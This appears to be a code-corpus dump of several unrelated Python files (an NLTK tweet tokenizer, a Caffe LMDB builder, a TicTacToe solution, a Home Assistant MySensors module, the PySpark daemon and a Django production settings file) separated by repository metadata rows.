# Natural Language Toolkit: Twitter Tokenizer
#
# Copyright (C) 2001-2020 NLTK Project
# Author: Christopher Potts <cgpotts@stanford.edu>
# Ewan Klein <ewan@inf.ed.ac.uk> (modifications)
# Pierpaolo Pantone <> (modifications)
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
#
"""
Twitter-aware tokenizer, designed to be flexible and easy to adapt to new domains and tasks. The basic logic is this:
1. The tuple regex_strings defines a list of regular expression strings.
2. The regex_strings strings are put, in order, into a compiled regular expression object called word_re.
3. The tokenization is done by word_re.findall(s), where s is the user-supplied string, inside the tokenize() method of
the class Tokenizer.
4. When instantiating Tokenizer objects, there is a single option: preserve_case. By default, it is set to True. If it
is set to False, then the tokenizer will downcase everything except for emoticons.
"""
######################################################################
#
# import regex # https://github.com/nltk/nltk/issues/2409
# import html
#
######################################################################
# The following strings are components in the regular expression
# that is used for tokenizing. It's important that phone_number
# appears first in the final regex (since it can contain whitespace).
# It also could matter that tags comes after emoticons, due to the
# possibility of having text like
#
# <:| and some text >:)
#
# Most importantly, the final element should always be last, since it
# does a last ditch whitespace-based tokenization of whatever is left.
# ToDo: Update with http://en.wikipedia.org/wiki/List_of_emoticons ?
# This particular element is used in a couple ways, so we define it
# with a name:
# docstyle-ignore
EMOTICONS = r"""
(?:
[<>]?
[:;=8] # eyes
[\-o\*\']? # optional nose
[\)\]\(\[dDpP/\:\}\{@\|\\] # mouth
|
[\)\]\(\[dDpP/\:\}\{@\|\\] # mouth
[\-o\*\']? # optional nose
[:;=8] # eyes
[<>]?
|
<3 # heart
)"""
# URL pattern due to John Gruber, modified by Tom Winzig. See
# https://gist.github.com/winzig/8894715
# docstyle-ignore
URLS = r""" # Capture 1: entire matched URL
(?:
https?: # URL protocol and colon
(?:
/{1,3} # 1-3 slashes
| # or
[a-z0-9%] # Single letter or digit or '%'
# (Trying not to match e.g. "URI::Escape")
)
| # or
# looks like domain name followed by a slash:
[a-z0-9.\-]+[.]
(?:[a-z]{2,13})
/
)
(?: # One or more:
[^\s()<>{}\[\]]+ # Run of non-space, non-()<>{}[]
| # or
\([^\s()]*?\([^\s()]+\)[^\s()]*?\) # balanced parens, one level deep: (...(...)...)
|
\([^\s]+?\) # balanced parens, non-recursive: (...)
)+
(?: # End with:
\([^\s()]*?\([^\s()]+\)[^\s()]*?\) # balanced parens, one level deep: (...(...)...)
|
\([^\s]+?\) # balanced parens, non-recursive: (...)
| # or
[^\s`!()\[\]{};:'".,<>?«»“”‘’] # not a space or one of these punct chars
)
| # OR, the following to match naked domains:
(?:
(?<!@) # not preceded by a @, avoid matching foo@_gmail.com_
[a-z0-9]+
(?:[.\-][a-z0-9]+)*
[.]
(?:[a-z]{2,13})
\b
/?
(?!@) # not succeeded by a @,
# avoid matching "foo.na" in "foo.na@example.com"
)
"""
# docstyle-ignore
# The components of the tokenizer:
REGEXPS = (
URLS,
# Phone numbers:
r"""
(?:
(?: # (international)
\+?[01]
[ *\-.\)]*
)?
(?: # (area code)
[\(]?
\d{3}
[ *\-.\)]*
)?
\d{3} # exchange
[ *\-.\)]*
\d{4} # base
)""",
# ASCII Emoticons
EMOTICONS,
# HTML tags:
r"""<[^>\s]+>""",
# ASCII Arrows
r"""[\-]+>|<[\-]+""",
# Twitter username:
r"""(?:@[\w_]+)""",
# Twitter hashtags:
r"""(?:\#+[\w_]+[\w\'_\-]*[\w_]+)""",
# email addresses
r"""[\w.+-]+@[\w-]+\.(?:[\w-]\.?)+[\w-]""",
# docstyle-ignore
# Remaining word types:
r"""
(?:[^\W\d_](?:[^\W\d_]|['\-_])+[^\W\d_]) # Words with apostrophes or dashes.
|
(?:[+\-]?\d+[,/.:-]\d+[+\-]?) # Numbers, including fractions, decimals.
|
(?:[\w_]+) # Words without apostrophes or dashes.
|
(?:\.(?:\s*\.){1,}) # Ellipsis dots.
|
(?:\S) # Everything else that isn't whitespace.
""",
)
######################################################################
# This is the core tokenizing regex:
WORD_RE = regex.compile(r"""(%s)""" % "|".join(REGEXPS), regex.VERBOSE | regex.I | regex.UNICODE)
# WORD_RE performs poorly on these patterns:
HANG_RE = regex.compile(r"([^a-zA-Z0-9])\1{3,}")
# The emoticon string gets its own regex so that we can preserve case for
# them as needed:
EMOTICON_RE = regex.compile(EMOTICONS, regex.VERBOSE | regex.I | regex.UNICODE)
# These are for regularizing HTML entities to Unicode:
ENT_RE = regex.compile(r"&(#?(x?))([^&;\s]+);")
######################################################################
# Functions for converting html entities
######################################################################
def _str_to_unicode(text, encoding=None, errors="strict"):
if encoding is None:
encoding = "utf-8"
if isinstance(text, bytes):
return text.decode(encoding, errors)
return text
def _replace_html_entities(text, keep=(), remove_illegal=True, encoding="utf-8"):
"""
Remove entities from text by converting them to their corresponding unicode character.
Args:
text:
A unicode string or a byte string encoded in the given `encoding` (which defaults to 'utf-8').
keep (list):
List of entity names which should not be replaced. This supports both numeric entities (``&#nnnn;`` and
``&#hhhh;``) and named entities (such as `` `` or ``>``).
remove_illegal (bool):
If `True`, entities that can't be converted are removed. Otherwise, entities that can't be converted are
kept "as is".
Returns: A unicode string with the entities removed.
See https://github.com/scrapy/w3lib/blob/master/w3lib/html.py
>>> from nltk.tokenize.casual import _replace_html_entities >>> _replace_html_entities(b'Price: £100')
'Price: \\xa3100' >>> print(_replace_html_entities(b'Price: £100')) Price: £100 >>>
"""
def _convert_entity(match):
entity_body = match.group(3)
if match.group(1):
try:
if match.group(2):
number = int(entity_body, 16)
else:
number = int(entity_body, 10)
# Numeric character references in the 80-9F range are typically
# interpreted by browsers as representing the characters mapped
# to bytes 80-9F in the Windows-1252 encoding. For more info
# see: https://en.wikipedia.org/wiki/ISO/IEC_8859-1#Similar_character_sets
if 0x80 <= number <= 0x9F:
return bytes((number,)).decode("cp1252")
except ValueError:
number = None
else:
if entity_body in keep:
return match.group(0)
else:
number = html.entities.name2codepoint.get(entity_body)
if number is not None:
try:
return chr(number)
except (ValueError, OverflowError):
pass
return "" if remove_illegal else match.group(0)
return ENT_RE.sub(_convert_entity, _str_to_unicode(text, encoding))
######################################################################
class TweetTokenizer:
r"""
Examples::
>>> # Tokenizer for tweets.
>>> from nltk.tokenize import TweetTokenizer
>>> tknzr = TweetTokenizer()
>>> s0 = "This is a cooool #dummysmiley: :-) :-P <3 and some arrows < > -> <--"
>>> tknzr.tokenize(s0)
['This', 'is', 'a', 'cooool', '#dummysmiley', ':', ':-)', ':-P', '<3', 'and', 'some', 'arrows', '<', '>', '->', '<--']
>>> # Examples using `strip_handles` and `reduce_len parameters`:
>>> tknzr = TweetTokenizer(strip_handles=True, reduce_len=True)
>>> s1 = '@remy: This is waaaaayyyy too much for you!!!!!!'
>>> tknzr.tokenize(s1)
[':', 'This', 'is', 'waaayyy', 'too', 'much', 'for', 'you', '!', '!', '!']
"""
def __init__(self, preserve_case=True, reduce_len=False, strip_handles=False):
self.preserve_case = preserve_case
self.reduce_len = reduce_len
self.strip_handles = strip_handles
def tokenize(self, text):
"""
Args:
text: str
Returns: list(str) A tokenized list of strings; concatenating this list returns the original string if
`preserve_case=False`
"""
# Fix HTML character entities:
text = _replace_html_entities(text)
# Remove username handles
if self.strip_handles:
text = remove_handles(text)
# Normalize word lengthening
if self.reduce_len:
text = reduce_lengthening(text)
# Shorten problematic sequences of characters
safe_text = HANG_RE.sub(r"\1\1\1", text)
# Tokenize:
words = WORD_RE.findall(safe_text)
# Possibly alter the case, but avoid changing emoticons like :D into :d:
if not self.preserve_case:
words = list(map((lambda x: x if EMOTICON_RE.search(x) else x.lower()), words))
return words
######################################################################
# Normalization Functions
######################################################################
def reduce_lengthening(text):
"""
Replace repeated character sequences of length 3 or greater with sequences of length 3.
"""
pattern = regex.compile(r"(.)\1{2,}")
return pattern.sub(r"\1\1\1", text)
def remove_handles(text):
"""
Remove Twitter username handles from text.
"""
pattern = regex.compile(
r"(?<![A-Za-z0-9_!@#\$%&*])@(([A-Za-z0-9_]){20}(?!@))|(?<![A-Za-z0-9_!@#\$%&*])@(([A-Za-z0-9_]){1,19})(?![A-Za-z0-9_]*@)"
)
# Substitute handles with ' ' to ensure that text on either side of removed handles are tokenized correctly
return pattern.sub(" ", text)
######################################################################
# Tokenization Function
######################################################################
def casual_tokenize(text, preserve_case=True, reduce_len=False, strip_handles=False):
"""
Convenience function for wrapping the tokenizer.
"""
return TweetTokenizer(preserve_case=preserve_case, reduce_len=reduce_len, strip_handles=strip_handles).tokenize(
text
)
###############################################################################
| 36.020888 | 133 | 0.55951 |
d47f54754bc960b7211c6944cf55ad6c39a012a8 | 3,211 | py | Python | scripts/create_lmdb.py | sagarjoglekar/ExplainingUrbanEmotions | 3b725b175435309cde3685b5b4af4c68ad867964 | [
"MIT"
] | 2 | 2018-04-24T14:26:46.000Z | 2021-02-02T08:16:04.000Z | scripts/create_lmdb.py | sagarjoglekar/ExplainingUrbanEmotions | 3b725b175435309cde3685b5b4af4c68ad867964 | [
"MIT"
] | null | null | null | scripts/create_lmdb.py | sagarjoglekar/ExplainingUrbanEmotions | 3b725b175435309cde3685b5b4af4c68ad867964 | [
"MIT"
] | null | null | null | '''
Description :This script divides the training images into 2 sets and stores them in lmdb databases for training and
'''
import os
import glob
import random
import numpy as np
import cv2
import caffe
from caffe.proto import caffe_pb2
import lmdb
#Size of images
IMAGE_WIDTH = 227
IMAGE_HEIGHT = 227
def transform_img(img, img_width=IMAGE_WIDTH, img_height=IMAGE_HEIGHT):
#Histogram Equalization
img[:, :, 0] = cv2.equalizeHist(img[:, :, 0])
img[:, :, 1] = cv2.equalizeHist(img[:, :, 1])
img[:, :, 2] = cv2.equalizeHist(img[:, :, 2])
#Image Resizing
img = cv2.resize(img, (img_width, img_height), interpolation = cv2.INTER_CUBIC)
return img
def make_datum(img, label):
#image is numpy.ndarray format. BGR instead of RGB
return caffe_pb2.Datum(
channels=3,
width=IMAGE_WIDTH,
height=IMAGE_HEIGHT,
label=label,
data=np.rollaxis(img, 2).tostring())
train_lmdb = '../Data/train_lmdb_Depress4'
validation_lmdb = '../Data/validation_lmdb_Depress4'
os.system('rm -rf ' + train_lmdb)
os.system('rm -rf ' + validation_lmdb)
#streetview/streetview/RankedBeauty_2/
train_data_beauty = [img for img in glob.glob("/work/sagarj/Work/BellLabs/streetview/RankedDepress_4/train/1/*jpg")]
train_data_ugly = [img for img in glob.glob("/work/sagarj/Work/BellLabs/streetview/RankedDepress_4/train/0/*jpg")]
test_data_beauty = [img for img in glob.glob("/work/sagarj/Work/BellLabs/streetview/RankedDepress_4/test/1/*jpg")]
test_data_ugly = [img for img in glob.glob("/work/sagarj/Work/BellLabs/streetview/RankedDepress_4/test/0/*jpg")]
train_data = train_data_beauty + train_data_ugly
test_data = test_data_beauty + test_data_ugly
#Shuffle train_data
random.shuffle(train_data)
random.shuffle(test_data)
print 'Creating train_lmdb'
in_db = lmdb.open(train_lmdb, map_size=int(1e12))
with in_db.begin(write=True) as in_txn:
for in_idx, img_path in enumerate(train_data):
# if in_idx % 6 == 0:
# continue
img = cv2.imread(img_path, cv2.IMREAD_COLOR)
img = transform_img(img, img_width=IMAGE_WIDTH, img_height=IMAGE_HEIGHT)
comp = img_path.split('/')
if comp[-2] == '0':
print "Ugg"
label = 0
else:
print "Pretty"
label = 1
datum = make_datum(img, label)
in_txn.put('{:0>5d}'.format(in_idx), datum.SerializeToString())
print '{:0>5d}'.format(in_idx) + ':' + img_path
in_db.close()
print '\nCreating validation_lmdb'
in_db = lmdb.open(validation_lmdb, map_size=int(1e12))
with in_db.begin(write=True) as in_txn:
for in_idx, img_path in enumerate(test_data):
# if in_idx % 6 != 0:
# continue
img = cv2.imread(img_path, cv2.IMREAD_COLOR)
img = transform_img(img, img_width=IMAGE_WIDTH, img_height=IMAGE_HEIGHT)
comp = img_path.split('/')
if comp[-2] == '0':
label = 0
else:
label = 1
datum = make_datum(img, label)
in_txn.put('{:0>5d}'.format(in_idx), datum.SerializeToString())
print '{:0>5d}'.format(in_idx) + ':' + img_path
in_db.close()
print '\nFinished processing all images'
| 30.580952 | 120 | 0.667393 |
30f9cb925f21c49e39502299b66fb2b9ef545f4f | 1,468 | py | Python | Python/design-tic-tac-toe.py | se77enn/LeetCode-Solution | d29ef5358cae592b63952c3d293897a176fb75e1 | [
"MIT"
] | 1 | 2020-10-27T03:22:31.000Z | 2020-10-27T03:22:31.000Z | Python/design-tic-tac-toe.py | se77enn/LeetCode-Solution | d29ef5358cae592b63952c3d293897a176fb75e1 | [
"MIT"
] | null | null | null | Python/design-tic-tac-toe.py | se77enn/LeetCode-Solution | d29ef5358cae592b63952c3d293897a176fb75e1 | [
"MIT"
] | 1 | 2021-03-22T18:58:23.000Z | 2021-03-22T18:58:23.000Z | # Time: O(1), per move.
# Space: O(n^2)
try:
xrange # Python 2
except NameError:
xrange = range # Python 3
class TicTacToe(object):
def __init__(self, n):
"""
Initialize your data structure here.
:type n: int
"""
self.__size = n
self.__rows = [[0, 0] for _ in xrange(n)]
self.__cols = [[0, 0] for _ in xrange(n)]
self.__diagonal = [0, 0]
self.__anti_diagonal = [0, 0]
def move(self, row, col, player):
"""
Player {player} makes a move at ({row}, {col}).
@param row The row of the board.
@param col The column of the board.
@param player The player, can be either 1 or 2.
@return The current winning condition, can be either:
0: No one wins.
1: Player 1 wins.
2: Player 2 wins.
:type row: int
:type col: int
:type player: int
:rtype: int
"""
i = player - 1
self.__rows[row][i] += 1
self.__cols[col][i] += 1
if row == col:
self.__diagonal[i] += 1
if col == len(self.__rows) - row - 1:
self.__anti_diagonal[i] += 1
if any(self.__rows[row][i] == self.__size,
self.__cols[col][i] == self.__size,
self.__diagonal[i] == self.__size,
self.__anti_diagonal[i] == self.__size):
return player
return 0
| 28.230769 | 61 | 0.498638 |
d5ae6c0c156638ad6b2f3199fcc2622053b3eaf3 | 8,033 | py | Python | homeassistant/components/mysensors/device.py | CantankerousBullMoose/core | 2178e27fb4c62271d4872e16838331defed82226 | [
"Apache-2.0"
] | 1 | 2021-03-12T20:46:40.000Z | 2021-03-12T20:46:40.000Z | homeassistant/components/mysensors/device.py | CantankerousBullMoose/core | 2178e27fb4c62271d4872e16838331defed82226 | [
"Apache-2.0"
] | 46 | 2020-12-18T07:15:15.000Z | 2022-03-31T06:04:00.000Z | homeassistant/components/mysensors/device.py | CantankerousBullMoose/core | 2178e27fb4c62271d4872e16838331defed82226 | [
"Apache-2.0"
] | 2 | 2021-03-22T21:42:48.000Z | 2021-04-12T12:26:39.000Z | """Handle MySensors devices."""
from functools import partial
import logging
from typing import Any, Dict, Optional
from mysensors import BaseAsyncGateway, Sensor
from mysensors.sensor import ChildSensor
from homeassistant.const import ATTR_BATTERY_LEVEL, STATE_OFF, STATE_ON
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import Entity
from .const import (
CHILD_CALLBACK,
CONF_DEVICE,
DOMAIN,
NODE_CALLBACK,
PLATFORM_TYPES,
UPDATE_DELAY,
DevId,
GatewayId,
)
_LOGGER = logging.getLogger(__name__)
ATTR_CHILD_ID = "child_id"
ATTR_DESCRIPTION = "description"
ATTR_DEVICE = "device"
ATTR_NODE_ID = "node_id"
ATTR_HEARTBEAT = "heartbeat"
MYSENSORS_PLATFORM_DEVICES = "mysensors_devices_{}"
class MySensorsDevice:
"""Representation of a MySensors device."""
def __init__(
self,
gateway_id: GatewayId,
gateway: BaseAsyncGateway,
node_id: int,
child_id: int,
value_type: int,
):
"""Set up the MySensors device."""
self.gateway_id: GatewayId = gateway_id
self.gateway: BaseAsyncGateway = gateway
self.node_id: int = node_id
self.child_id: int = child_id
self.value_type: int = value_type # value_type as int. string variant can be looked up in gateway consts
self.child_type = self._child.type
self._values = {}
self._update_scheduled = False
self.hass = None
@property
def dev_id(self) -> DevId:
"""Return the DevId of this device.
It is used to route incoming MySensors messages to the correct device/entity.
"""
return self.gateway_id, self.node_id, self.child_id, self.value_type
@property
def _logger(self):
return logging.getLogger(f"{__name__}.{self.name}")
async def async_will_remove_from_hass(self):
"""Remove this entity from home assistant."""
for platform in PLATFORM_TYPES:
platform_str = MYSENSORS_PLATFORM_DEVICES.format(platform)
if platform_str in self.hass.data[DOMAIN]:
platform_dict = self.hass.data[DOMAIN][platform_str]
if self.dev_id in platform_dict:
del platform_dict[self.dev_id]
self._logger.debug(
"deleted %s from platform %s", self.dev_id, platform
)
@property
def _node(self) -> Sensor:
return self.gateway.sensors[self.node_id]
@property
def _child(self) -> ChildSensor:
return self._node.children[self.child_id]
@property
def sketch_name(self) -> str:
"""Return the name of the sketch running on the whole node (will be the same for several entities!)."""
return self._node.sketch_name
@property
def sketch_version(self) -> str:
"""Return the version of the sketch running on the whole node (will be the same for several entities!)."""
return self._node.sketch_version
@property
def node_name(self) -> str:
"""Name of the whole node (will be the same for several entities!)."""
return f"{self.sketch_name} {self.node_id}"
@property
def unique_id(self) -> str:
"""Return a unique ID for use in home assistant."""
return f"{self.gateway_id}-{self.node_id}-{self.child_id}-{self.value_type}"
@property
def device_info(self) -> Optional[Dict[str, Any]]:
"""Return a dict that allows home assistant to puzzle all entities belonging to a node together."""
return {
"identifiers": {(DOMAIN, f"{self.gateway_id}-{self.node_id}")},
"name": self.node_name,
"manufacturer": DOMAIN,
"sw_version": self.sketch_version,
}
@property
def name(self):
"""Return the name of this entity."""
return f"{self.node_name} {self.child_id}"
@property
def extra_state_attributes(self):
"""Return device specific state attributes."""
node = self.gateway.sensors[self.node_id]
child = node.children[self.child_id]
attr = {
ATTR_BATTERY_LEVEL: node.battery_level,
ATTR_HEARTBEAT: node.heartbeat,
ATTR_CHILD_ID: self.child_id,
ATTR_DESCRIPTION: child.description,
ATTR_NODE_ID: self.node_id,
}
# This works when we are actually an Entity (i.e. all platforms except device_tracker)
if hasattr(self, "platform"):
# pylint: disable=no-member
attr[ATTR_DEVICE] = self.platform.config_entry.data[CONF_DEVICE]
set_req = self.gateway.const.SetReq
for value_type, value in self._values.items():
attr[set_req(value_type).name] = value
return attr
async def async_update(self):
"""Update the controller with the latest value from a sensor."""
node = self.gateway.sensors[self.node_id]
child = node.children[self.child_id]
set_req = self.gateway.const.SetReq
for value_type, value in child.values.items():
_LOGGER.debug(
"Entity update: %s: value_type %s, value = %s",
self.name,
value_type,
value,
)
if value_type in (
set_req.V_ARMED,
set_req.V_LIGHT,
set_req.V_LOCK_STATUS,
set_req.V_TRIPPED,
set_req.V_UP,
set_req.V_DOWN,
set_req.V_STOP,
):
self._values[value_type] = STATE_ON if int(value) == 1 else STATE_OFF
elif value_type == set_req.V_DIMMER:
self._values[value_type] = int(value)
else:
self._values[value_type] = value
async def _async_update_callback(self):
"""Update the device."""
raise NotImplementedError
@callback
def async_update_callback(self):
"""Update the device after delay."""
if self._update_scheduled:
return
async def update():
"""Perform update."""
try:
await self._async_update_callback()
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Error updating %s", self.name)
finally:
self._update_scheduled = False
self._update_scheduled = True
delayed_update = partial(self.hass.async_create_task, update())
self.hass.loop.call_later(UPDATE_DELAY, delayed_update)
def get_mysensors_devices(hass, domain: str) -> Dict[DevId, MySensorsDevice]:
"""Return MySensors devices for a hass platform name."""
if MYSENSORS_PLATFORM_DEVICES.format(domain) not in hass.data[DOMAIN]:
hass.data[DOMAIN][MYSENSORS_PLATFORM_DEVICES.format(domain)] = {}
return hass.data[DOMAIN][MYSENSORS_PLATFORM_DEVICES.format(domain)]
class MySensorsEntity(MySensorsDevice, Entity):
"""Representation of a MySensors entity."""
@property
def should_poll(self):
"""Return the polling state. The gateway pushes its states."""
return False
@property
def available(self):
"""Return true if entity is available."""
return self.value_type in self._values
async def _async_update_callback(self):
"""Update the entity."""
await self.async_update_ha_state(True)
async def async_added_to_hass(self):
"""Register update callback."""
self.async_on_remove(
async_dispatcher_connect(
self.hass,
CHILD_CALLBACK.format(*self.dev_id),
self.async_update_callback,
)
)
self.async_on_remove(
async_dispatcher_connect(
self.hass,
NODE_CALLBACK.format(self.gateway_id, self.node_id),
self.async_update_callback,
)
)
| 33.610879 | 114 | 0.622806 |
e7d1e718c934af9c553471513451bb0b092f4de7 | 6,731 | py | Python | python/pyspark/daemon.py | boyizhang/spark-2.3.2 | 3be504eb086c9f5a9ab857ae41fc037dad36f38d | [
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"PostgreSQL",
"BSD-3-Clause"
] | 289 | 2018-06-03T15:22:04.000Z | 2021-12-08T14:17:38.000Z | python/pyspark/daemon.py | cfmcgrady/spark-adaptive | 6ad93e786856496c726f172ee409ac90f1dc6f2e | [
"Apache-2.0"
] | 95 | 2016-08-29T09:00:58.000Z | 2020-03-30T11:23:50.000Z | python/pyspark/daemon.py | cfmcgrady/spark-adaptive | 6ad93e786856496c726f172ee409ac90f1dc6f2e | [
"Apache-2.0"
] | 113 | 2018-06-01T01:50:00.000Z | 2021-08-24T15:40:27.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numbers
import os
import signal
import select
import socket
import sys
import traceback
import time
import gc
from errno import EINTR, EAGAIN
from socket import AF_INET, SOCK_STREAM, SOMAXCONN
from signal import SIGHUP, SIGTERM, SIGCHLD, SIG_DFL, SIG_IGN, SIGINT
from pyspark.worker import main as worker_main
from pyspark.serializers import read_int, write_int, write_with_length, UTF8Deserializer
def compute_real_exit_code(exit_code):
# SystemExit's code can be integer or string, but os._exit only accepts integers
if isinstance(exit_code, numbers.Integral):
return exit_code
else:
return 1
def worker(sock, authenticated):
"""
Called by a worker process after the fork().
"""
signal.signal(SIGHUP, SIG_DFL)
signal.signal(SIGCHLD, SIG_DFL)
signal.signal(SIGTERM, SIG_DFL)
# restore the handler for SIGINT,
# it's useful for debugging (show the stacktrace before exit)
signal.signal(SIGINT, signal.default_int_handler)
# Read the socket using fdopen instead of socket.makefile() because the latter
# seems to be very slow; note that we need to dup() the file descriptor because
# otherwise writes also cause a seek that makes us miss data on the read side.
infile = os.fdopen(os.dup(sock.fileno()), "rb", 65536)
outfile = os.fdopen(os.dup(sock.fileno()), "wb", 65536)
if not authenticated:
client_secret = UTF8Deserializer().loads(infile)
if os.environ["PYTHON_WORKER_FACTORY_SECRET"] == client_secret:
write_with_length("ok".encode("utf-8"), outfile)
outfile.flush()
else:
write_with_length("err".encode("utf-8"), outfile)
outfile.flush()
sock.close()
return 1
exit_code = 0
try:
worker_main(infile, outfile)
except SystemExit as exc:
exit_code = compute_real_exit_code(exc.code)
finally:
try:
outfile.flush()
except Exception:
pass
return exit_code
def manager():
# Create a new process group to corral our children
os.setpgid(0, 0)
# Create a listening socket on the AF_INET loopback interface
listen_sock = socket.socket(AF_INET, SOCK_STREAM)
listen_sock.bind(('127.0.0.1', 0))
listen_sock.listen(max(1024, SOMAXCONN))
listen_host, listen_port = listen_sock.getsockname()
# re-open stdin/stdout in 'wb' mode
stdin_bin = os.fdopen(sys.stdin.fileno(), 'rb', 4)
stdout_bin = os.fdopen(sys.stdout.fileno(), 'wb', 4)
write_int(listen_port, stdout_bin)
stdout_bin.flush()
def shutdown(code):
signal.signal(SIGTERM, SIG_DFL)
# Send SIGHUP to notify workers of shutdown
os.kill(0, SIGHUP)
exit(code)
def handle_sigterm(*args):
shutdown(1)
signal.signal(SIGTERM, handle_sigterm) # Gracefully exit on SIGTERM
signal.signal(SIGHUP, SIG_IGN) # Don't die on SIGHUP
signal.signal(SIGCHLD, SIG_IGN)
reuse = os.environ.get("SPARK_REUSE_WORKER")
# Initialization complete
try:
while True:
try:
ready_fds = select.select([0, listen_sock], [], [], 1)[0]
except select.error as ex:
if ex[0] == EINTR:
continue
else:
raise
if 0 in ready_fds:
try:
worker_pid = read_int(stdin_bin)
except EOFError:
# Spark told us to exit by closing stdin
shutdown(0)
try:
os.kill(worker_pid, signal.SIGKILL)
except OSError:
pass # process already died
if listen_sock in ready_fds:
try:
sock, _ = listen_sock.accept()
except OSError as e:
if e.errno == EINTR:
continue
raise
# Launch a worker process
try:
pid = os.fork()
except OSError as e:
if e.errno in (EAGAIN, EINTR):
time.sleep(1)
pid = os.fork() # error here will shutdown daemon
else:
outfile = sock.makefile(mode='wb')
write_int(e.errno, outfile) # Signal that the fork failed
outfile.flush()
outfile.close()
sock.close()
continue
if pid == 0:
# in child process
listen_sock.close()
try:
# Acknowledge that the fork was successful
outfile = sock.makefile(mode="wb")
write_int(os.getpid(), outfile)
outfile.flush()
outfile.close()
authenticated = False
while True:
code = worker(sock, authenticated)
if code == 0:
authenticated = True
if not reuse or code:
# wait for closing
try:
while sock.recv(1024):
pass
except Exception:
pass
break
gc.collect()
except:
traceback.print_exc()
os._exit(1)
else:
os._exit(0)
else:
sock.close()
finally:
shutdown(1)
if __name__ == '__main__':
manager()
| 34.341837 | 88 | 0.548507 |
f4f36ba0faebfdc15a4b09d0663970496949e0c7 | 8,070 | py | Python | config/settings/production.py | dhavalsavalia/university_dost | ef6c78239dd648542b68b610528e0b9a23a94295 | [
"MIT"
] | null | null | null | config/settings/production.py | dhavalsavalia/university_dost | ef6c78239dd648542b68b610528e0b9a23a94295 | [
"MIT"
] | null | null | null | config/settings/production.py | dhavalsavalia/university_dost | ef6c78239dd648542b68b610528e0b9a23a94295 | [
"MIT"
] | 1 | 2020-06-05T09:29:09.000Z | 2020-06-05T09:29:09.000Z | import logging
import sentry_sdk
from sentry_sdk.integrations.celery import CeleryIntegration
from sentry_sdk.integrations.django import DjangoIntegration
from sentry_sdk.integrations.logging import LoggingIntegration
from .base import * # noqa
from .base import env
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = env("DJANGO_SECRET_KEY")
# https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts
ALLOWED_HOSTS = env.list("DJANGO_ALLOWED_HOSTS", default=["universitydost.in"])
# DATABASES
# ------------------------------------------------------------------------------
DATABASES["default"] = env.db("DATABASE_URL") # noqa F405
DATABASES["default"]["ATOMIC_REQUESTS"] = True # noqa F405
DATABASES["default"]["CONN_MAX_AGE"] = env.int("CONN_MAX_AGE", default=60) # noqa F405
# CACHES
# ------------------------------------------------------------------------------
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": env("REDIS_URL"),
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
# Mimicing memcache behavior.
# http://jazzband.github.io/django-redis/latest/#_memcached_exceptions_behavior
"IGNORE_EXCEPTIONS": True,
},
}
}
# SECURITY
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-proxy-ssl-header
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-ssl-redirect
SECURE_SSL_REDIRECT = env.bool("DJANGO_SECURE_SSL_REDIRECT", default=True)
# https://docs.djangoproject.com/en/dev/ref/settings/#session-cookie-secure
SESSION_COOKIE_SECURE = True
# https://docs.djangoproject.com/en/dev/ref/settings/#csrf-cookie-secure
CSRF_COOKIE_SECURE = True
# https://docs.djangoproject.com/en/dev/topics/security/#ssl-https
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-seconds
# TODO: set this to 60 seconds first and then to 518400 once you prove the former works
SECURE_HSTS_SECONDS = 60
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-include-subdomains
SECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool(
"DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS", default=True
)
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-preload
SECURE_HSTS_PRELOAD = env.bool("DJANGO_SECURE_HSTS_PRELOAD", default=True)
# https://docs.djangoproject.com/en/dev/ref/middleware/#x-content-type-options-nosniff
SECURE_CONTENT_TYPE_NOSNIFF = env.bool(
"DJANGO_SECURE_CONTENT_TYPE_NOSNIFF", default=True
)
# STORAGES
# ------------------------------------------------------------------------------
# https://django-storages.readthedocs.io/en/latest/#installation
INSTALLED_APPS += ["storages"] # noqa F405
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_ACCESS_KEY_ID = env("DJANGO_AWS_ACCESS_KEY_ID")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_SECRET_ACCESS_KEY = env("DJANGO_AWS_SECRET_ACCESS_KEY")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_STORAGE_BUCKET_NAME = env("DJANGO_AWS_STORAGE_BUCKET_NAME")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_ENDPOINT_URL = env("DJANGO_AWS_S3_ENDPOINT_URL")
AWS_QUERYSTRING_AUTH = False
# DO NOT change these unless you know what you're doing.
_AWS_EXPIRY = 60 * 60 * 24 * 7
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_OBJECT_PARAMETERS = {
"CacheControl": f"max-age={_AWS_EXPIRY}, s-maxage={_AWS_EXPIRY}, must-revalidate"
}
